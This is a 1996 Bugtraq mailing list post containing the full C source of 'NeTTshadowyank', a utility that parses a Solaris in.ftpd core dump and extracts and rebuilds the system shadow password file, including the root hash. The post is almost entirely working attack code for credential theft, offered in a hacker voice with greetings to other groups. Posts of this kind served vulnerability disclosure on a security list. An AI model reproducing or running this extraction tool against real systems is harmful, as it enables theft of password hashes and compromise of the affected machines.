Bugtraq mailing list archives
Simple util for xtracting shadow files out of solaris in.ftpd
From: nettwerk () milkyway com (San Mehat)
Date: Fri, 18 Oct 1996 15:44:09 -0400
/* NeTTshadowyank.c, by NeTTwerk (nettwerk () spyder org) Oct 17, 1996 Released into the Public Domain (not for use with some sets) **NeTTshadowyank** Version 1.0 nettwerk () spyder org NeTTshadowyank is a simple utility which reads a corefile created by in.ftpd, and pulls out the shadow file 8).. it also reconstructs the root password (which is corrupted in the shadow entry buffer), and puts it in the appropriate place in the targetfile 'NeTTshadowyank.shadow'. This is a really brainless program from the perspective that it does very *little* inteligence... Version 2.0, will have my infamous 'heuristics engine' which will *look* for shadow entries/passwd entries in the binary file. (btw: if you dont know *how* to make in.ftpd dump core with the shadow file inside it, tough luck) Greets for this little util go out for BioH,mudge,glyph (all the l0pht guys), bika,k,rommel,hobbit and of course,whoever wrote in.ftpd ;) latah. questions can be sent to nettwerk () spyder org */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <malloc.h> #include <unistd.h> #include <sys/elftypes.h> #include <elf.h> #include <fcntl.h> #include <sys/stat.h> #define ROOT_OFFSET 0xd7d4 #define SHADOW_OFFSET 0xfadb void main(argc,argv) int argc; char **argv; { FILE *fp; FILE *fp2; char SZ_line[255]; Elf32_Ehdr *Telf32_hdr; int I_fd; void *Vp_buff; struct stat Sstat_buf; char *Cp_ptr; if (argc!=2) { printf("[NeTTshadowyank] Usage: %s corefilename\n",argv[0]); exit(0); } if ((I_fd=open(argv[1],O_RDONLY))<0) { perror("Opening Corefile"); exit(0); } if (fstat(I_fd,&Sstat_buf)<0) { perror("fstat()'ing file"); exit(0); } printf("[NeTTshadowyank] Loading %s, size %d bytes\n",argv[1],Sstat_buf.st_size); if (!(Vp_buff=malloc(Sstat_buf.st_size))) { printf("Out of Memory\n"); exit(0); } memset(Vp_buff,0,Sstat_buf.st_size); if (read(I_fd,(char *)Vp_buff,Sstat_buf.st_size)<0) { perror("Reading corefile"); exit(0); } Telf32_hdr = (Elf32_Ehdr *)Vp_buff; printf("File Type ->%c%c%c%c\n",Telf32_hdr->e_ident[EI_MAG0] ,Telf32_hdr->e_ident[EI_MAG1] ,Telf32_hdr->e_ident[EI_MAG2] ,Telf32_hdr->e_ident[EI_MAG3]); printf("File Class->0x%x",Telf32_hdr->e_ident[EI_CLASS]); if (Telf32_hdr->e_ident[EI_CLASS]==1) printf(" (32 Bit Binary)\n"); else if (Telf32_hdr->e_ident[EI_CLASS]==2) printf(" (64 Bit Binary)\n"); else printf(" (BAD Binary)\n"); printf("File Data ->0x%x",Telf32_hdr->e_ident[EI_DATA]); if (Telf32_hdr->e_ident[EI_DATA]==1) printf(" (Least Significant Bit)\n"); else if (Telf32_hdr->e_ident[EI_DATA]==2) printf(" (Most Significant Bit)\n"); else printf(" (BAD Binary)\n"); printf("File Vers ->0x%x\n",Telf32_hdr->e_ident[EI_VERSION]); printf("File Type ->0x%x",Telf32_hdr->e_type); if (Telf32_hdr->e_type==1) printf(" (Relocatable Executable)\n"); else if (Telf32_hdr->e_type==2) printf(" (EXEC Executable)\n"); else if (Telf32_hdr->e_type==3) printf(" (Dynamic Executable)\n"); else if (Telf32_hdr->e_type==4) printf(" (Core Dump [Post-Mortem])\n"); else if (Telf32_hdr->e_type==5) printf(" (Numeric Executable)\n"); else printf(" (Unknown Binary Format)\n"); Cp_ptr=Vp_buff+ROOT_OFFSET; printf("Root Password location (%s) ->%s\n",ROOT_OFFSET,Cp_ptr); printf("Reconstructing shadow file\n"); if (!(fp=fopen("NeTTshadowyank.scratch","w"))) { perror("Creating scratch file"); exit(0); } Cp_ptr=Vp_buff+SHADOW_OFFSET; while(1) { if (!strncmp(Cp_ptr,"lic_key",7)) break; if (*Cp_ptr=='#') break; if (*Cp_ptr==0) fprintf(fp," "); else fprintf(fp,"%c",*Cp_ptr); Cp_ptr++; } fclose(fp); if (!(fp=fopen("NeTTshadowyank.scratch","r"))) { perror("Opening Scratch File"); exit(0); } if (!(fp2=fopen("NeTTshadowyank.shadow","w"))) { perror("Creating target file"); exit(0); } while(fgets(SZ_line,sizeof(SZ_line),fp)) { SZ_line[(strlen(SZ_line)-1)]=0; if (!strncmp(SZ_line,"root",4)) { Cp_ptr=Vp_buff+ROOT_OFFSET; printf("[NeTTshadowyank] Repairing Root Shadow Entry\n"); fprintf(fp2,"root:%s:0::::::\n",Cp_ptr); } else fprintf(fp2,"%s\n",SZ_line); } }
Current thread:
- Simple util for xtracting shadow files out of solaris in.ftpd San Mehat (Oct 18)